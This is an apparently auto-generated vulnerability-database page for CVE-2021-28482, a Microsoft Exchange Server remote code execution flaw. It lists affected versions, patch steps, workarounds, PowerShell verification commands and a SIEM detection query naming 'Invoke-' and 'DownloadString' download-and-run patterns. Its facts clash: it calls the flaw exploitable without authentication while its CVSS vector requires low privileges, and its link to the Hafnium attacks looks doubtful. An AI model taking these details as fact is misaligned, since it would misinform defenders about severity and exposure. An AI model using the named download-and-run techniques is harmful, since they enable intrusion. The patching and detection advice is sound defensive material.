Login Sign Up

CVE-2021-28482

8.8 HIGH
Remote Code Execution

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary code on Microsoft Exchange Server without authentication. It affects organizations running vulnerable Exchange Server versions, potentially exposing email communications and server control.

💻 Affected Systems

Products:
  • Microsoft Exchange Server
Versions: Exchange Server 2013, 2016, 2019
Operating Systems: Windows Server
Default Config Vulnerable: ⚠️ Yes
Notes: All supported Exchange Server versions are affected. Exchange Online is not affected.

📦 What is this software?

Exchange Server by Microsoft

View all CVEs affecting Exchange Server →

Exchange Server by Microsoft

View all CVEs affecting Exchange Server →

Exchange Server by Microsoft

View all CVEs affecting Exchange Server →

Exchange Server by Microsoft

View all CVEs affecting Exchange Server →

Exchange Server by Microsoft

View all CVEs affecting Exchange Server →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full compromise of Exchange Server leading to data exfiltration, ransomware deployment, and persistent backdoor access to corporate email systems.

🟠

Likely Case

Unauthenticated attackers gaining initial foothold on Exchange Server, enabling further lateral movement and data theft.

🟢

If Mitigated

Attack blocked at network perimeter or detected before code execution completes.

🌐 Internet-Facing: HIGH - Exchange servers are often internet-facing for email access, making them prime targets.
🏢 Internal Only: MEDIUM - Internal attackers could exploit if network segmentation is weak.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

This vulnerability was actively exploited in the wild as part of the Hafnium attacks. Exploitation requires no authentication.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Security updates for Exchange Server 2013 CU23, 2016 CU19, 2019 CU8 and later

Vendor Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28482

Restart Required: Yes

Instructions:

1. Download appropriate security update from Microsoft Update Catalog. 2. Install update on all Exchange servers. 3. Restart Exchange services or server as required. 4. Verify installation via Exchange Management Shell: Get-ExchangeServer | Format-List Name, Edition, AdminDisplayVersion.

🔧 Temporary Workarounds

Block HTTP/HTTPS access to Exchange Server

windows

Temporarily restrict external access to Exchange Server while patching

Use firewall rules to block ports 443 and 80 from external networks

Enable Windows Defender Antivirus

windows

Ensure real-time protection is active to detect exploitation attempts

Get-MpComputerStatus | Select-Object RealTimeProtectionEnabled

🧯 If You Can't Patch

  • Isolate Exchange Server from internet using firewall rules
  • Implement network segmentation to limit lateral movement from Exchange Server

🔍 How to Verify

Check if Vulnerable:

Check Exchange Server version: Get-ExchangeServer | Format-List Name, Edition, AdminDisplayVersion. If version is below patched CU versions, system is vulnerable.

Check Version:

Get-ExchangeServer | Format-List Name, Edition, AdminDisplayVersion

Verify Fix Applied:

Verify security update is installed: Get-HotFix | Where-Object {$_.Description -like '*Exchange*'}. Check version is at or above patched CU.

📡 Detection & Monitoring

Log Indicators:

  • Unusual PowerShell execution from Exchange Server
  • Suspicious IIS logs showing exploitation patterns
  • Event ID 4688 with suspicious process creation

Network Indicators:

  • Unusual outbound connections from Exchange Server
  • HTTP requests to suspicious external IPs

SIEM Query:

source="Exchange" AND (process="powershell.exe" OR cmdline="*Invoke-*" OR cmdline="*DownloadString*")

📊 Metadata

CVE ID: CVE-2021-28482
CVSS v3 Score: 8.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Published: April 13, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON